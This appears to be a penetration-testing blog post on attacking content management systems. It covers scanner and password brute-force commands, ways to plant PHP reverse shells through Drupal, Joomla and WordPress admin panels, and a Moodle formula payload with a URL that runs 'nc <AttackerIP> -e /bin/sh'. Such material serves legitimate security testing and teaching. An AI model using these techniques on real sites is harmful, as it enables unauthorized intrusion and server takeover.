CMS Exploitation

3 minute read

Post covering information on Content Management Systems, scanning for any vulnerabilities present, and attack scenarios for various systems.

What is CMS?

CMS stands for Content Management System. In short a CMS is used to manage the creation and modification of digital content. Some popular examples of CMS packages you may have heard of include Wordpress, Joomla, Drupal and Moodle. All of these packages just so happen to be primarily written in the same language.


The two most commonly used CMSs are Enterprise Content Management and Web Content Management. It is usually very straightforward to get a shell once you’ve gained access to the user/admin interface with valid credentials for all of the Content Management Systems previously stated.


CMS Scanning


droopescan scan -u <url> 

BlindElephant.py <url> drupal 
droopescan scan drupal -u <url> -t <threads>

cmsmap.py -t <url>
cmsmap.py -t <url> -u admin -p /root/rockyou.txt

BlindElephant.py <url> joomla
joomscan -u <url>

BlindElephant.py <url> wordpress
wpscan -u <ip>
wpscan -u <ip> --enumerate u
wpscan -u <ip> --log output.txt
wpscan -u <ip> --usernames <wordlist>
wpscan -u <ip> -U admin -w <wordlist>
wpscan -u <url> --threads 20 -wordlist /root/rockyou.txt -username admin
wpscan --url <url> -e vv,tt,u,ap,vp
wpscan -u <url> --enumerate t --enumerate p --enumerate u

nmap -sV --script http-wordpress-enum --script-args limit=25 <IP>


Drupal


Once you gain access to the Drupal admin interface you need to navigate to Modules and enable the checkboxes for Path and PHP filter.

Once this is complete go to Content > Add Content > Basic Page, this creates a basic page where we have the ability to write malicious code which will enable us to spawn a reverse shell.

Simply give the page a title and copy in a malicious php payload (msfvenom/pentestmonkey etc.), click the save button and you’ll receive a reverse shell pretty instantaneously. Besides from this authenticated code execution, numerous vulnerabilities/PoCs exist on the web and are easily exploited.

Joomla


Getting a shell via the Joomla admin interface is just as easy as with Drupal, in fact most CMSs share very similar vulnerabilities regarding authenticated file upload/code execution.

There are a few different ways to get a shell via the Joomla interface. I tend to use the template method, you simply go to Template Customiser swap out the php for a malicious payload (msfvenom/pentestmonkey) start your nc listener and when you click Template preview you’ll get a shell.

Moodle


Moodle suffers from some serious vulnerabilities regarding SQLi and Code execution which can be found on exploitdb/searchsploit.

There is a brilliant article written by Robin Peragile that covers a popular RCE method once you’ve gained access to the Moodle teacher/admin interface. The method abuses a maths formula quiz component to essentially get the notorious cmd <?php echo system($_REQUEST['cmd']);?> so you can execute system commands on the web server.

/*{a*/`$_GET[0]`;//{x}}   // php cmd formula equivalent

http://<IP>/moodle/question/question.php?returnurl=....&0=(nc <AttackerIP> <Port> -e /bin/sh)   // Execute nc rev shell on web server


Using this method we’re able to get a shell as www-data and escalate our privileges to root. The article for this technique is a great read: Moodle RCE.

Wordpress


Aside from the numerous Wordpress plugin vulnerabilities that are easily exploitable.. XSS, LFI, RFI, Code execution, SQLi, Unauthenticated file upload etc. the easiest way to get a shell once you’re into the admin interface goes as follows:

  • Go to the Appearance tab
  • Click on Editor
  • Select the 404.php file (or any .php file under the Templates tab)
  • Swap out the code & replace with php reverse shell code (pentestmonkey php rev shell / msfvenom php/meterpreter/reverse_tcp etc.)
  • Go to the location of the file & it’ll execute our reverse shell

In this scenario the theme in use was Twenty Twelve


Simply going to the address of our modified 404.php file triggers the shell:

http://<ip>/wp-content/themes/twentytwelve/404.php

Have a netcat listener ready beforehand to recieve the connection:

# nc -nlvp 443
listening on [any] 443 ...
connect to [AttackerIP] from (UNKNOWN) [VictimIP] 59617
...
$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@pwned:/$ 

If you’re using a CMS, be sure to enforce a strong password policy and keep those credentials secure. Defensive scanning using the tools mentioned earlier can identify whether your site has any critical security vulnerabilities, so regular assessments are vital to the security of your web applications.